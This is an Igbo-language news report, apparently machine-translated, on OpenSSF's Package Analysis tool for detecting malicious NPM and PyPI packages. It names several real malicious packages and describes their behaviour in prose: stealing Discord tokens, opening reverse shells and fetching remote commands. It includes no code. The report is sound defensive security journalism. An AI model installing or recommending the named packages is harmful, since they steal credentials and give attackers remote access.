OpenSSF (Open Source Security Foundation), nke Linux Foundation hibere na ebumnuche imeziwanye nchekwa nke sọftụwia mepere emepe, webatara ngwugwu ngwugwu mepere emepe, nke na-ewepụta usoro maka nyocha ọnụnọ nke koodu ọjọọ na ngwugwu. Edere koodu ọrụ ahụ na Go wee kesaa n'okpuru ikike Apache 2.0. Nyocha mbụ nke ebe nchekwa NPM na PyPI site na iji ngwaọrụ ndị a tụrụ aro mere ka anyị mata ihe karịrị ngwugwu ọjọọ 200 achọpụtabeghị na mbụ.
Ihe ka ukwuu n'ime ngwugwu nsogbu achọpụtara na-ejikwa njikọ nke aha nwere ntụkwasị obi na-abụghị nke ọha na eze (mwakpo mgbagwoju anya) ma ọ bụ jiri ụzọ typosquatting (ekenye aha ndị yiri aha ụlọ akwụkwọ ndị a ma ama), ma na-akpọkwa scripts na-enweta ndị ọbịa mpụga n'oge. usoro nwụnye. Dị ka ndị mmepe nke nchịkọta ngwugwu si kwuo, ọtụtụ n'ime ngwugwu nsogbu achọpụtara bụ ndị nyocha nchekwa na-ekere òkè na mmemme bounty ahụhụ, ebe ọ bụ na data ezitere bụ naanị onye ọrụ na aha sistemụ, a na-emekwa omume ahụ n'ụzọ doro anya, na-enweghị mbọ iji. zoo àgwà ha.
Ngwungwu nwere omume ọjọọ gụnyere:
- ngwungwu PyPI discordcmd, nke na-edekọ izipu arịrịọ ụdị na raw.githubusercontent.com, Discord API na ipinfo.io. Ngwa a kapịrị ọnụ ebudatara koodu azụ azụ site na GitHub wee tinye ya na ndekọ ndị ahịa Discord Windows, mgbe nke ahụ gasịrị, ọ malitere usoro ịchọ ihe ngosi Discord na sistemụ faịlụ wee ziga ha na sava Discord mpụga nke ndị mwakpo ahụ na-achịkwa.
- Ngwungwu NPM Colorss nwakwara izipu akara sitere na akaụntụ Discord na sava mpụga.
- NPM ngwugwu @roku-web-core/ajax - n'oge nrụnye o zigara data gbasara sistemụ ahụ wee malite onye na-ahụ maka njikwa (reverse shei) nke nabatara njikọ mpụga wee malite iwu.
- Ngwungwu PyPI secrevthree - weputara shei azụ mgbe ị na-ebubata otu modul.
- NPM ngwugwu random-vouchercode-generator - mgbe ibubata ụlọ akwụkwọ ahụ, o zigara arịrịọ na sava mpụga, nke weghachiri iwu na oge a ga-agba ọsọ.
Ọrụ nke nyocha ngwugwu na-agbadata na nyocha ngwungwu koodu na koodu isi mmalite maka ịmepụta njikọ netwọkụ, ịnweta faịlụ, na iwu ịgba ọsọ. Na mgbakwunye, a na-enyocha mgbanwe na ọnọdụ ngwugwu iji chọpụta mgbakwunye nke ntinye obi ọjọọ na otu ntọhapụ nke ngwanro adịghị emerụ ahụ na mbụ. Iji nyochaa ọdịdị nke ngwugwu ọhụrụ na ebe nchekwa ma mee mgbanwe na ngwugwu ezigara na mbụ, a na-eji ngwa ngwugwu ngwugwu, nke na-ejikọta ọrụ na NPM, PyPI, Go, RubyGems, Packagist, NuGet na Crate repositories.
Nchịkọta ngwugwu gụnyere ihe atọ bụ isi nke enwere ike iji na njikọ yana iche:
- Onye nhazi maka ịmalite ọrụ nyocha ngwugwu dabere na data sitere na nri ngwugwu.
- Onye nyocha nke na-enyocha ngwugwu ozugbo wee na-enyocha omume ya site na iji nyocha static na usoro nchọta ike. A na-eme ule ahụ na ebe dịpụrụ adịpụ.
- Ihe ntinye nke na-etinye nsonaazụ ule na nchekwa BigQuery.
isi: opennet.ru